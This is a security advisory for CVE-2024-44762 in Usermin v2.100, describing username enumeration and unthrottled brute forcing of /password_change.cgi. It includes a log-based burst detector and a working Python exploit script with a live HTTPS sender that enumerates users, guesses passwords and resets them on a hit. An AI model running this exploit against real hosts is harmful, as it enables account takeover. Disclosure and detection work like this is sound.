Overview
Key information
– Vendor: Webmin
– Product & Version: Usermin v2.100
– Affected component: the password_change.cgi page in Usermin v2.100
– Vulnerabilities: username enumeration & brute force (no rate limiting, no lockout)
– Attack vector: to exploit these vulnerabilities, an attacker sends multiple unauthenticated POST requests to the /password_change.cgi endpoint.
– CVE Number: CVE-2024-44762
Username enumeration description
The error message returned by password_change.cgi differs depending on whether the submitted login name exists, which allows an unauthenticated attacker to enumerate valid user accounts (Usermin v2.100).
Brute force vulnerability description
There is no rate limiting and no lockout mechanism on the password_change.cgi page (Usermin v2.100), so the page can be brute forced. An attacker can first enumerate a username and then brute force that user's current password on the same page. Once a valid password has been found, the attacker can set a new password for the account.
Both vulnerabilities are present in the default configuration and can be exploited without any authentication.
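Because nothing throttles the endpoint, a successful attack leaves a dense run of POSTs to /password_change.cgi from a single source in the Usermin access log. The detector below is added here as an example (it is not part of the advisory or of Webmin/Usermin) and counts such POSTs per source IP over a sliding window. It assumes miniserv.log is written in Common Log Format; the SAMPLE_LOG lines, IP addresses, timestamps and status codes are constructed for the demo.

```python
"""Spot password_change.cgi bursts in a Usermin access log (added example).

Not from the advisory. ASSUMPTION: miniserv.log is written in Common Log
Format; the SAMPLE_LOG lines below are constructed for this demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for a CLF line, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def find_bursts(lines, threshold=10, window=timedelta(seconds=60),
                path="/password_change.cgi"):
    """Return {ip: peak_count} for sources that POSTed to `path` at least
    `threshold` times inside any sliding `window`. A legitimate user changes
    a password once; a run of POSTs is enumeration or brute force."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            stamps_by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample: one source fires 25 POSTs in 25 seconds, another
# changes a password once. Status codes are illustrative, not observed.
SAMPLE_LOG = [
    f'203.0.113.5 - - [29/Aug/2024:10:00:{i:02d} +0000] '
    f'"POST /password_change.cgi HTTP/1.1" 200 1843'
    for i in range(25)
] + [
    '198.51.100.7 - - [29/Aug/2024:10:05:10 +0000] "GET /password_change.cgi HTTP/1.1" 200 1843',
    '198.51.100.7 - - [29/Aug/2024:10:05:40 +0000] "POST /password_change.cgi HTTP/1.1" 200 1843',
    '198.51.100.7 - - [29/Aug/2024:10:05:41 +0000] "POST /session_login.cgi HTTP/1.1" 302 0',
    'garbage line that should be ignored',
]

if __name__ == "__main__":
    for ip, n in find_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to /password_change.cgi within 60s")
```

The threshold and window are tunable; even a slow attacker stands out because a real user submits this form once, so a low threshold over a long window (for example 5 POSTs per hour) is reasonable on a small host.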
Username enumeration steps
After installing Webmin and Usermin, the Usermin login page is reachable at https://127.0.0.1:20000/ as shown in the image below:
Perform a POST request to /password_change.cgi with the following parameters:
user=UsernameHere&pam=&expired=2&old=pass&new1=new&new2=new
With an invalid username, the response contains an error stating that the login name was not found in the password file:
With a valid username but an invalid password, the error instead states that the current password is incorrect:
Because there is no rate limiting on this request, usernames can be enumerated in bulk and then used in the brute force attack described below.
Brute force steps
The same request to /password_change.cgi can be used to brute force an account and change its password; the only difference is that the username is now fixed and the old parameter is brute forced:
user=UsernameHere&pam=&expired=2&old=pass&new1=NewPass!&new2=NewPass!
A dictionary or brute force attack on the old parameter reveals the current password and, on the first correct guess, replaces it with the value of new1/new2. Below shows a successful password change:
Once the password has been changed, the attacker can log in to Usermin with the new password.
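The two procedures above (enumerate usernames, then brute force the old parameter for each one) as a single script, added here as an example; it is not code from the original advisory or from Usermin. It assumes the error pages contain the phrases the advisory quotes ("not found in the password file", "current password is incorrect"); those markers, the fake_usermin() stand-in that reproduces the three outcomes, the constructed account alice/winter2024, and the http_sender() transport are all assumptions made for the example.

```python
"""Enumerate-then-brute-force against /password_change.cgi (added example).

Not code from the advisory. The response markers below are ASSUMED from
the advisory's description of the two error messages; adjust them if the
wording on your target differs. fake_usermin() is a constructed stand-in
so the logic runs offline; http_sender() is the real transport.
"""
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Substrings matched case-insensitively in the response body (assumption).
NOT_FOUND_MARKER = "not found in the password file"
BAD_PASSWORD_MARKER = "current password is incorrect"


def build_request_body(user, old, new):
    """Form body from the advisory; expired=2 selects the change-password flow."""
    return urllib.parse.urlencode({
        "user": user, "pam": "", "expired": "2",
        "old": old, "new1": new, "new2": new,
    })


def classify_response(body):
    """Map a response body to 'no_such_user', 'bad_password' or 'changed'."""
    text = body.lower()
    if NOT_FOUND_MARKER in text:
        return "no_such_user"
    if BAD_PASSWORD_MARKER in text:
        return "bad_password"
    return "changed"


def enumerate_users(send, candidates, probe_password="!enum-probe!"):
    """Return the candidates the server does not reject as unknown.

    send(body) -> response text is injected so the logic is testable
    without a live instance. The probe password should be one nobody uses:
    if it happened to be correct, the probe itself would reset the account.
    """
    found = []
    for user in candidates:
        body = build_request_body(user, probe_password, "new")
        if classify_response(send(body)) != "no_such_user":
            found.append(user)
    return found


def brute_force(send, user, wordlist, new_password="NewPass!"):
    """Try each guess as `old`; the first accepted guess also resets the password."""
    for guess in wordlist:
        if classify_response(send(build_request_body(user, guess, new_password))) == "changed":
            return guess
    return None


def http_sender(base_url="https://127.0.0.1:20000", verify_tls=False):
    """Real transport for an instance you are authorised to test."""
    ctx = ssl.create_default_context()
    if not verify_tls:  # Usermin's default certificate is self-signed
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE

    def send(body):
        req = urllib.request.Request(
            base_url + "/password_change.cgi", data=body.encode(),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            method="POST")
        try:
            with urllib.request.urlopen(req, context=ctx) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # keep the error page body
            return err.read().decode(errors="replace")
    return send


def fake_usermin(accounts):
    """Constructed stand-in reproducing the three outcomes the advisory describes."""
    def send(body):
        form = dict(urllib.parse.parse_qsl(body, keep_blank_values=True))
        if form["user"] not in accounts:
            return "Failed to change password : Login name was not found in the password file"
        if form["old"] != accounts[form["user"]]:
            return "Failed to change password : Current password is incorrect"
        accounts[form["user"]] = form["new1"]
        return "Password changed"
    return send


if __name__ == "__main__":
    server = fake_usermin({"alice": "winter2024"})  # constructed account
    users = enumerate_users(server, ["root", "alice", "bob"])
    print("valid users:", users)
    for u in users:
        print(u, "->", brute_force(server, u, ["password", "winter2024", "letmein"]))
```

To run it against a real instance, replace fake_usermin(...) with http_sender("https://host:20000"). Both stages are destructive on a hit: a correct probe password during enumeration, or a correct guess during brute forcing, immediately resets the account's password, which is also why the owner of a hijacked account will notice at their next login.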
CVSSv3.1 Score
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3)
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44762
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
https://portswigger.net/burp
https://webmin.com/